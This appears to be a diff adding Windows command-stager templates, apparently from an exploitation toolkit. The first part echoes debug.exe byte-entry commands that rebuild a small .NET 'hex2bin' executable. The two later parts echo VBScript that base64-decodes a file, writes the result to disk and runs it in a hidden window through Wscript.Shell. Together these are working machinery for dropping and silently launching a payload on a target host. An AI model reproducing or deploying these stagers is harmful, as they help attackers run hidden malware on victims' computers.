+echo e 670 4b >>decoder_stub
+echo e 672 76 >>decoder_stub
+echo e 674 2e >>decoder_stub
+echo e 676 53 >>decoder_stub
+echo e 678 94 >>decoder_stub
+echo e 67a 2e >>decoder_stub
+echo e 67c 63 >>decoder_stub
+echo e 67e be >>decoder_stub
+echo e 680 2e >>decoder_stub
+echo e 682 6b >>decoder_stub
+echo e 684 cb >>decoder_stub
+echo e 686 2e >>decoder_stub
+echo e 688 73 >>decoder_stub
+echo e 68a d4 >>decoder_stub
+echo e 68c 2e >>decoder_stub
+echo e 68e 7b >>decoder_stub
+echo e 690 dd >>decoder_stub
+echo e 692 5d >>decoder_stub
+echo e 694 04 80 >>decoder_stub
+echo e 698 01 >>decoder_stub
+echo e 6a6 1e >>decoder_stub
+echo e 6aa 02 >>decoder_stub
+echo e 6b6 01 >>decoder_stub
+echo e 6b8 26 >>decoder_stub
+echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
+echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
+echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
+echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
+echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
+echo e 6ef 53 79 73 74 65 6d >>decoder_stub
+echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
+echo e 6fd 4d 61 69 6e >>decoder_stub
+echo e 702 2e 63 74 6f 72 >>decoder_stub
+echo e 708 61 72 67 73 >>decoder_stub
+echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
+echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
+echo e 733 74 65 >>decoder_stub
+echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
+echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
+echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
+echo e 786 62 75 74 65 >>decoder_stub
+echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
+echo e 79f 62 75 74 65 >>decoder_stub
+echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
+echo e 7b8 72 69 62 75 74 65 >>decoder_stub
+echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
+echo e 7d3 72 69 62 75 74 65 >>decoder_stub
+echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
+echo e 7ee 62 75 74 65 >>decoder_stub
+echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
+echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
+echo e 848 62 75 74 65 >>decoder_stub
+echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
+echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
+echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
+echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
+echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
+echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
+echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
+echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
+echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
+echo e 91a 46 69 6c 65 >>decoder_stub
+echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
+echo e 92b 53 74 72 69 6e 67 >>decoder_stub
+echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
+echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
+echo e 945 42 79 74 65 >>decoder_stub
+echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
+echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
+echo e 95c 54 6f 42 79 74 65 >>decoder_stub
+echo e 963 43 6f 6e 63 61 74 >>decoder_stub
+echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
+echo e 975 43 72 65 61 74 65 >>decoder_stub
+echo e 97c 53 74 72 65 61 6d >>decoder_stub
+echo e 983 57 72 69 74 65 >>decoder_stub
+echo e 989 43 6c 6f 73 65 >>decoder_stub
+echo e 991 49 55 >>decoder_stub
+echo e 994 73 >>decoder_stub
+echo e 996 61 >>decoder_stub
+echo e 998 67 >>decoder_stub
+echo e 99a 65 >>decoder_stub
+echo e 99c 3a >>decoder_stub
+echo e 99e 20 >>decoder_stub
+echo e 9a0 20 >>decoder_stub
+echo e 9a2 20 >>decoder_stub
+echo e 9a4 68 >>decoder_stub
+echo e 9a6 65 >>decoder_stub
+echo e 9a8 78 >>decoder_stub
+echo e 9aa 32 >>decoder_stub
+echo e 9ac 62 >>decoder_stub
+echo e 9ae 69 >>decoder_stub
+echo e 9b0 6e >>decoder_stub
+echo e 9b2 2e >>decoder_stub
+echo e 9b4 65 >>decoder_stub
+echo e 9b6 78 >>decoder_stub
+echo e 9b8 65 >>decoder_stub
+echo e 9ba 20 >>decoder_stub
+echo e 9bc 3c >>decoder_stub
+echo e 9be 68 >>decoder_stub
+echo e 9c0 65 >>decoder_stub
+echo e 9c2 78 >>decoder_stub
+echo e 9c4 69 >>decoder_stub
+echo e 9c6 6e >>decoder_stub
+echo e 9c8 70 >>decoder_stub
+echo e 9ca 75 >>decoder_stub
+echo e 9cc 74 >>decoder_stub
+echo e 9ce 66 >>decoder_stub
+echo e 9d0 69 >>decoder_stub
+echo e 9d2 6c >>decoder_stub
+echo e 9d4 65 >>decoder_stub
+echo e 9d6 3e >>decoder_stub
+echo e 9d8 08 >>decoder_stub
+echo e 9da 01 03 0d >>decoder_stub
+echo e 9df 01 >>decoder_stub
+echo e 9e1 03 0a >>decoder_stub
+echo e 9e5 09 2e >>decoder_stub
+echo e 9e8 65 >>decoder_stub
+echo e 9ea 78 >>decoder_stub
+echo e 9ec 65 >>decoder_stub
+echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
+echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
+echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
+echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
+echo e a27 01 08 04 >>decoder_stub
+echo e a2b 01 01 0e 04 >>decoder_stub
+echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
+echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
+echo e a45 02 05 0e 08 05 >>decoder_stub
+echo e a4b 02 0e 0e 0e 05 >>decoder_stub
+echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
+echo e a65 08 12 5d 02 0c 01 >>decoder_stub
+echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
+echo e a76 05 01 >>decoder_stub
+echo e a7c 17 01 >>decoder_stub
+echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
+echo e a94 29 01 >>decoder_stub
+echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
+echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
+echo e abe 0c 01 >>decoder_stub
+echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
+echo e acb 08 01 >>decoder_stub
+echo e ace 07 01 >>decoder_stub
+echo e ad4 08 01 >>decoder_stub
+echo e ad7 08 >>decoder_stub
+echo e add 1e 01 >>decoder_stub
+echo e ae0 01 >>decoder_stub
+echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
+echo e af6 68 72 6f 77 73 01 >>decoder_stub
+echo e b00 85 18 7c 48 >>decoder_stub
+echo e b08 02 >>decoder_stub
+echo e b0c 53 >>decoder_stub
+echo e b10 18 28 >>decoder_stub
+echo e b14 18 0a >>decoder_stub
+echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
+echo e b2c 03 >>decoder_stub
+echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
+echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
+echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
+echo e b6c 94 28 >>decoder_stub
+echo e b78 ae 28 >>decoder_stub
+echo e b7d 20 >>decoder_stub
+echo e b94 a0 28 >>decoder_stub
+echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
+echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
+echo e bbe ff 25 >>decoder_stub
+echo e bc1 20 40 >>decoder_stub
+echo e d0e 02 >>decoder_stub
+echo e d10 10 >>decoder_stub
+echo e d14 20 >>decoder_stub
+echo e d17 80 18 >>decoder_stub
+echo e d1c 38 >>decoder_stub
+echo e d1f 80 >>decoder_stub
+echo e d2e 01 >>decoder_stub
+echo e d30 01 >>decoder_stub
+echo e d34 50 >>decoder_stub
+echo e d37 80 >>decoder_stub
+echo e d46 01 >>decoder_stub
+echo e d48 01 >>decoder_stub
+echo e d4c 68 >>decoder_stub
+echo e d4f 80 >>decoder_stub
+echo e d5e 01 >>decoder_stub
+echo e d64 80 >>decoder_stub
+echo e d76 01 >>decoder_stub
+echo e d7c 90 >>decoder_stub
+echo e d80 a0 40 >>decoder_stub
+echo e d84 a0 02 >>decoder_stub
+echo e d90 40 43 >>decoder_stub
+echo e d94 ea 01 >>decoder_stub
+echo e da0 a0 02 34 >>decoder_stub
+echo e da6 56 >>decoder_stub
+echo e da8 53 >>decoder_stub
+echo e daa 5f >>decoder_stub
+echo e dac 56 >>decoder_stub
+echo e dae 45 >>decoder_stub
+echo e db0 52 >>decoder_stub
+echo e db2 53 >>decoder_stub
+echo e db4 49 >>decoder_stub
+echo e db6 4f >>decoder_stub
+echo e db8 4e >>decoder_stub
+echo e dba 5f >>decoder_stub
+echo e dbc 49 >>decoder_stub
+echo e dbe 4e >>decoder_stub
+echo e dc0 46 >>decoder_stub
+echo e dc2 4f >>decoder_stub
+echo e dc8 bd 04 ef fe >>decoder_stub
+echo e dce 01 >>decoder_stub
+echo e dd2 01 >>decoder_stub
+echo e dda 01 >>decoder_stub
+echo e de0 3f >>decoder_stub
+echo e de8 04 >>decoder_stub
+echo e dec 01 >>decoder_stub
+echo e dfc 44 >>decoder_stub
+echo e e00 01 >>decoder_stub
+echo e e02 56 >>decoder_stub
+echo e e04 61 >>decoder_stub
+echo e e06 72 >>decoder_stub
+echo e e08 46 >>decoder_stub
+echo e e0a 69 >>decoder_stub
+echo e e0c 6c >>decoder_stub
+echo e e0e 65 >>decoder_stub
+echo e e10 49 >>decoder_stub
+echo e e12 6e >>decoder_stub
+echo e e14 66 >>decoder_stub
+echo e e16 6f >>decoder_stub
+echo e e1c 24 >>decoder_stub
+echo e e1e 04 >>decoder_stub
+echo e e22 54 >>decoder_stub
+echo e e24 72 >>decoder_stub
+echo e e26 61 >>decoder_stub
+echo e e28 6e >>decoder_stub
+echo e e2a 73 >>decoder_stub
+echo e e2c 6c >>decoder_stub
+echo e e2e 61 >>decoder_stub
+echo e e30 74 >>decoder_stub
+echo e e32 69 >>decoder_stub
+echo e e34 6f >>decoder_stub
+echo e e36 6e >>decoder_stub
+echo e e3e b0 04 >>decoder_stub
+echo e e41 02 >>decoder_stub
+echo e e44 01 >>decoder_stub
+echo e e46 53 >>decoder_stub
+echo e e48 74 >>decoder_stub
+echo e e4a 72 >>decoder_stub
+echo e e4c 69 >>decoder_stub
+echo e e4e 6e >>decoder_stub
+echo e e50 67 >>decoder_stub
+echo e e52 46 >>decoder_stub
+echo e e54 69 >>decoder_stub
+echo e e56 6c >>decoder_stub
+echo e e58 65 >>decoder_stub
+echo e e5a 49 >>decoder_stub
+echo e e5c 6e >>decoder_stub
+echo e e5e 66 >>decoder_stub
+echo e e60 6f >>decoder_stub
+echo e e64 dc 01 >>decoder_stub
+echo e e68 01 >>decoder_stub
+echo e e6a 30 >>decoder_stub
+echo e e6c 30 >>decoder_stub
+echo e e6e 30 >>decoder_stub
+echo e e70 30 >>decoder_stub
+echo e e72 30 >>decoder_stub
+echo e e74 34 >>decoder_stub
+echo e e76 62 >>decoder_stub
+echo e e78 30 >>decoder_stub
+echo e e7c 38 >>decoder_stub
+echo e e7e 08 >>decoder_stub
+echo e e80 01 >>decoder_stub
+echo e e82 46 >>decoder_stub
+echo e e84 69 >>decoder_stub
+echo e e86 6c >>decoder_stub
+echo e e88 65 >>decoder_stub
+echo e e8a 44 >>decoder_stub
+echo e e8c 65 >>decoder_stub
+echo e e8e 73 >>decoder_stub
+echo e e90 63 >>decoder_stub
+echo e e92 72 >>decoder_stub
+echo e e94 69 >>decoder_stub
+echo e e96 70 >>decoder_stub
+echo e e98 74 >>decoder_stub
+echo e e9a 69 >>decoder_stub
+echo e e9c 6f >>decoder_stub
+echo e e9e 6e >>decoder_stub
+echo e ea4 68 >>decoder_stub
+echo e ea6 65 >>decoder_stub
+echo e ea8 78 >>decoder_stub
+echo e eaa 32 >>decoder_stub
+echo e eac 62 >>decoder_stub
+echo e eae 69 >>decoder_stub
+echo e eb0 6e >>decoder_stub
+echo e eb4 30 >>decoder_stub
+echo e eb6 08 >>decoder_stub
+echo e eb8 01 >>decoder_stub
+echo e eba 46 >>decoder_stub
+echo e ebc 69 >>decoder_stub
+echo e ebe 6c >>decoder_stub
+echo e ec0 65 >>decoder_stub
+echo e ec2 56 >>decoder_stub
+echo e ec4 65 >>decoder_stub
+echo e ec6 72 >>decoder_stub
+echo e ec8 73 >>decoder_stub
+echo e eca 69 >>decoder_stub
+echo e ecc 6f >>decoder_stub
+echo e ece 6e >>decoder_stub
+echo e ed4 31 >>decoder_stub
+echo e ed6 2e >>decoder_stub
+echo e ed8 30 >>decoder_stub
+echo e eda 2e >>decoder_stub
+echo e edc 30 >>decoder_stub
+echo e ede 2e >>decoder_stub
+echo e ee0 30 >>decoder_stub
+echo e ee4 38 >>decoder_stub
+echo e ee6 0c >>decoder_stub
+echo e ee8 01 >>decoder_stub
+echo e eea 49 >>decoder_stub
+echo e eec 6e >>decoder_stub
+echo e eee 74 >>decoder_stub
+echo e ef0 65 >>decoder_stub
+echo e ef2 72 >>decoder_stub
+echo e ef4 6e >>decoder_stub
+echo e ef6 61 >>decoder_stub
+echo e ef8 6c >>decoder_stub
+echo e efa 4e >>decoder_stub
+echo e efc 61 >>decoder_stub
+echo e efe 6d >>decoder_stub
+echo e f00 65 >>decoder_stub
+echo e f04 68 >>decoder_stub
+echo e f06 65 >>decoder_stub
+echo e f08 78 >>decoder_stub
+echo e f0a 32 >>decoder_stub
+echo e f0c 62 >>decoder_stub
+echo e f0e 69 >>decoder_stub
+echo e f10 6e >>decoder_stub
+echo e f12 2e >>decoder_stub
+echo e f14 65 >>decoder_stub
+echo e f16 78 >>decoder_stub
+echo e f18 65 >>decoder_stub
+echo e f1c 48 >>decoder_stub
+echo e f1e 12 >>decoder_stub
+echo e f20 01 >>decoder_stub
+echo e f22 4c >>decoder_stub
+echo e f24 65 >>decoder_stub
+echo e f26 67 >>decoder_stub
+echo e f28 61 >>decoder_stub
+echo e f2a 6c >>decoder_stub
+echo e f2c 43 >>decoder_stub
+echo e f2e 6f >>decoder_stub
+echo e f30 70 >>decoder_stub
+echo e f32 79 >>decoder_stub
+echo e f34 72 >>decoder_stub
+echo e f36 69 >>decoder_stub
+echo e f38 67 >>decoder_stub
+echo e f3a 68 >>decoder_stub
+echo e f3c 74 >>decoder_stub
+echo e f40 43 >>decoder_stub
+echo e f42 6f >>decoder_stub
+echo e f44 70 >>decoder_stub
+echo e f46 79 >>decoder_stub
+echo e f48 72 >>decoder_stub
+echo e f4a 69 >>decoder_stub
+echo e f4c 67 >>decoder_stub
+echo e f4e 68 >>decoder_stub
+echo e f50 74 >>decoder_stub
+echo e f52 20 >>decoder_stub
+echo e f54 a9 >>decoder_stub
+echo e f56 20 >>decoder_stub
+echo e f58 20 >>decoder_stub
+echo e f5a 32 >>decoder_stub
+echo e f5c 30 >>decoder_stub
+echo e f5e 30 >>decoder_stub
+echo e f60 38 >>decoder_stub
+echo e f64 40 >>decoder_stub
+echo e f66 0c >>decoder_stub
+echo e f68 01 >>decoder_stub
+echo e f6a 4f >>decoder_stub
+echo e f6c 72 >>decoder_stub
+echo e f6e 69 >>decoder_stub
+echo e f70 67 >>decoder_stub
+echo e f72 69 >>decoder_stub
+echo e f74 6e >>decoder_stub
+echo e f76 61 >>decoder_stub
+echo e f78 6c >>decoder_stub
+echo e f7a 46 >>decoder_stub
+echo e f7c 69 >>decoder_stub
+echo e f7e 6c >>decoder_stub
+echo e f80 65 >>decoder_stub
+echo e f82 6e >>decoder_stub
+echo e f84 61 >>decoder_stub
+echo e f86 6d >>decoder_stub
+echo e f88 65 >>decoder_stub
+echo e f8c 68 >>decoder_stub
+echo e f8e 65 >>decoder_stub
+echo e f90 78 >>decoder_stub
+echo e f92 32 >>decoder_stub
+echo e f94 62 >>decoder_stub
+echo e f96 69 >>decoder_stub
+echo e f98 6e >>decoder_stub
+echo e f9a 2e >>decoder_stub
+echo e f9c 65 >>decoder_stub
+echo e f9e 78 >>decoder_stub
+echo e fa0 65 >>decoder_stub
+echo e fa4 30 >>decoder_stub
+echo e fa6 08 >>decoder_stub
+echo e fa8 01 >>decoder_stub
+echo e faa 50 >>decoder_stub
+echo e fac 72 >>decoder_stub
+echo e fae 6f >>decoder_stub
+echo e fb0 64 >>decoder_stub
+echo e fb2 75 >>decoder_stub
+echo e fb4 63 >>decoder_stub
+echo e fb6 74 >>decoder_stub
+echo e fb8 4e >>decoder_stub
+echo e fba 61 >>decoder_stub
+echo e fbc 6d >>decoder_stub
+echo e fbe 65 >>decoder_stub
+echo e fc4 68 >>decoder_stub
+echo e fc6 65 >>decoder_stub
+echo e fc8 78 >>decoder_stub
+echo e fca 32 >>decoder_stub
+echo e fcc 62 >>decoder_stub
+echo e fce 69 >>decoder_stub
+echo e fd0 6e >>decoder_stub
+echo e fd4 34 >>decoder_stub
+echo e fd6 08 >>decoder_stub
+echo e fd8 01 >>decoder_stub
+echo e fda 50 >>decoder_stub
+echo e fdc 72 >>decoder_stub
+echo e fde 6f >>decoder_stub
+echo e fe0 64 >>decoder_stub
+echo e fe2 75 >>decoder_stub
+echo e fe4 63 >>decoder_stub
+echo e fe6 74 >>decoder_stub
+echo e fe8 56 >>decoder_stub
+echo e fea 65 >>decoder_stub
+echo e fec 72 >>decoder_stub
+echo e fee 73 >>decoder_stub
+echo e ff0 69 >>decoder_stub
+echo e ff2 6f >>decoder_stub
+echo e ff4 6e >>decoder_stub
+echo e ff8 31 >>decoder_stub
+echo e ffa 2e >>decoder_stub
+echo e ffc 30 >>decoder_stub
+echo e ffe 2e >>decoder_stub
+echo e 1000 30 >>decoder_stub
+echo e 1002 2e >>decoder_stub
+echo e 1004 30 >>decoder_stub
+echo e 1008 38 >>decoder_stub
+echo e 100a 08 >>decoder_stub
+echo e 100c 01 >>decoder_stub
+echo e 100e 41 >>decoder_stub
+echo e 1010 73 >>decoder_stub
+echo e 1012 73 >>decoder_stub
+echo e 1014 65 >>decoder_stub
+echo e 1016 6d >>decoder_stub
+echo e 1018 62 >>decoder_stub
+echo e 101a 6c >>decoder_stub
+echo e 101c 79 >>decoder_stub
+echo e 101e 20 >>decoder_stub
+echo e 1020 56 >>decoder_stub
+echo e 1022 65 >>decoder_stub
+echo e 1024 72 >>decoder_stub
+echo e 1026 73 >>decoder_stub
+echo e 1028 69 >>decoder_stub
+echo e 102a 6f >>decoder_stub
+echo e 102c 6e >>decoder_stub
+echo e 1030 31 >>decoder_stub
+echo e 1032 2e >>decoder_stub
+echo e 1034 30 >>decoder_stub
+echo e 1036 2e >>decoder_stub
+echo e 1038 30 >>decoder_stub
+echo e 103a 2e >>decoder_stub
+echo e 103c 30 >>decoder_stub
+echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
+echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
+echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
+echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
+echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
+echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
+echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
+echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
+echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
+echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
+echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
+echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
+echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
+echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
+echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
+echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
+echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
+echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
+echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
+echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
+echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
+echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
+echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
+echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
+echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
+echo e 1301 20 >>decoder_stub
+echo e 1304 0c >>decoder_stub
+echo e 1308 c0 38 >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
@@ -0,0 +1,40 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,50 @@
+echo Dim var_origLoc >>decode_stub
+echo var_origLoc = SetLocale(1033) >>decode_stub
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
+echo var_writedir = "DECODED" >>decode_stub
+echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
+echo var_strmConv.Type = 2 >>decode_stub
+echo var_strmConv.Charset = "x-ansi" >>decode_stub
+echo var_strmConv.Open >>decode_stub
+echo var_strmConv.WriteText data, 0 >>decode_stub
+echo var_strmConv.Position = 0 >>decode_stub
+echo var_strmConv.Type = 1 >>decode_stub
+echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
+echo SetLocale(var_origLoc) >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
